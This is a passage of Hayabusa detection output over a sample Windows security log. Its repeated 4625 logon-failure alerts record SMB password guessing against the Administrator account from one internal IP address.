NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8xD2aZArxVdrO6fG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHJN2mJgwQEZhXBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: untyxmsmYrfRlHcu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eOc2R5V6p9VBsYI2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5Ld2NDMjbY3tiT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ykdbglaCU82nRvk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tDGrsVIC5qVEwC6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UouNQa3EkcsMICiO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u0exIftdu0qPLrRC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q5mMNIdJj0BItrv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb2cVBffdBlwwGQP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p2FbHoSFFdnM4wH7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RAbCN4xKDDlhmrkU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxBwuSDdNZlE2F96 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M3JkwIQF7yV42rOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6QiHHeHeY8yWOiJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rhzpo2bEgpJCB51w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuyPyMMT4wQhLIEz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no5bOZf3SEsrETun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBTHVleOipnyVFIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JNFE2jNifGI7pELk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LgkAKJ57rYqCdbew : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daKQcllU63lW4ypy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBSPSAoEBS7JRYuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94bI5pb8CGjY3QZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1obedLuMFlHlSvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EPn1yJV358YAFALV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qA7N5DMAJqNYkumM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Lk95NYGG5iLBFBw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3DDtXECsK61pIYy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rt8bfBDTV5wYfBO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uTYMgN5kmFpyj7xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmyF6j61wosCE0sg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fd61fJBRizl2AIGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDIFX7lsmGqSGvkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVmto6S25gU2bkwa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7QMbzSuGuzzMK0v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJUynF5bN1Oj0vaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dg4ZtybY5BnPN0nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gRmRV9ct3hor8Muk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QRjaP1mj9FgKsGBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CCzzatQ195mcxQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJPIrtk5GBAhsUlR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 720RHwyXQcxvsJBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GofmHRstuhljMDOL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wQUQ4INktwXwRkaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WHs5hduf7SmUcLK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gdo1txjJXiRLbUDH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JK8jP3ftKQOyutGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdbEjo88dBJRhrKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZCVkXkwhbuSM654 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z2mc9WScfBa88rtO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lee7qYLkXQoz8rRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g1ZKpZuZU1WRoC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4ST7RrHJxAQHHbn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GtW1hBHF97YqvN4N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVKlPytPofO9LQBm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GOkZ9yjvfL51UYXo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAxfxSbRqGO7Dej0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D7XmvDYk6zFLir09 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mWcl6CKdSMxd8edZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SxBQlFZvGBqDdobn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXN94VanwME6q8rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOj7CZ3stJXePY8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXjmqxguFGL3f8cV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHWmdxnRrMbxrdlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ROBnjuyHn4FRugk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zGxuUxasL680O21l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYoM984EzAkUtBoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0e3ATNpzeeAf6Qax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1A0dGhpVy8kgiRP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGgNAKJM5RAt9B5K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c3DpedXujvQpZnjQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BsaSjESaUHbsIxJL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ca4dlxyEco3VOapw : IP Address: 192.168.198.149 : AuthPackage: 